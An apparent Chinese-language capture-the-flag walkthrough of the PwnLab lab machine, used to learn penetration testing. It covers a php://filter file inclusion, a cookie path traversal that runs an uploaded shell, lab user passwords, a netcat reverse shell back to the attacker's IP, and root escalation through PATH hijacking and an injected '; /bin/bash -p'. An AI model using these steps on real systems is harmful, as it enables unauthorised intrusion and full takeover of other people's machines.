文章目录
一、基础信息
Kali IP :192.168.20.146
靶机IP:192.168.20.157
二、信息收集
nmap -sS -sV -p- -A 192.168.20.157
开放了80、111、3306、50749等端口
访问一下80端口
提示使用这个服务进行上传和共享图片文件等,点击一下upload需要登录
扫描目录看一下
dirsearch -u http://192.168.20.157 -x 403
访问images目录看到有一张图片,保存到本地看一下有没有信息
http://192.168.20.157/images/pwnlab.png
好像没啥内容,然后看到了文件上传的目录
然后有几个php文件,但是访问没有内容显示
三、漏洞利用
通过观察网址有可能是存在文件包含的,利用php伪协议进行查看文件
包含config文件,经过尝试后要去掉php后缀
http://192.168.20.157/?page=php://filter/convert.base64-encode/resource=config
解码得到数据库密码,同时可以尝试包含upload和index文件,解码可得到源码
连接数据库查看账户信息
得到三个用户和密码信息,密码疑似base64加密,可进行解密得到密码
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRo尝试登录之前的页面
登录成功,尝试上传文件
上传成功
前面知道上传地址,蚁剑访问一下,连接不成功
分析index.php源代码,它以cookie的值作为路径,这个参数为lang
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.那我们就添加一个cookie:lang=../upload/85bb6e49a1be4be02eefb660f9d8cf68.jpg
连接成功
四、反弹shell
nc -e /bin/bash 192.168.20.146 9090
五、提权
上面获得了三个账户密码,尝试登录一下
kent /JWzXuBJJNy
Mike/SIfdsTEn6I
Kane/iSv5Ym2GRoMike账户无法登录,Kent登录后没发现特殊内容
登录到kane用户,发现家目录下有个msgmike文件,但是文件拥有者是mike,不是很清楚文件是干什么的,看wp提示说该程序的作者试图在cat不提供完整路径的情况下运行了命令!
提权方法:
在运行Bash程序cat的/tmp目录中创建了一个文件shell,并将其添加到$PATH环境变量的开头,系统先cat在/tmp目录中查找二进制文件,并将执行我们的shell!
在tmp目录下:
echo /bin/bash > cat ---创建一个shell命令的文件:/bin/sh
chmod 777 cat ---赋权
export PATH=/tmp:$PATH ---赋予tmp目录环境变量
cd && ./msgmike
cd /home/mike
在mike目录下存在msg2root文件,但是文件拥有者为root
尝试再次执行不完整路径任意命令sh,成功获得root权限!
./msg2root
; /bin/bash -p
more /root/flag.txt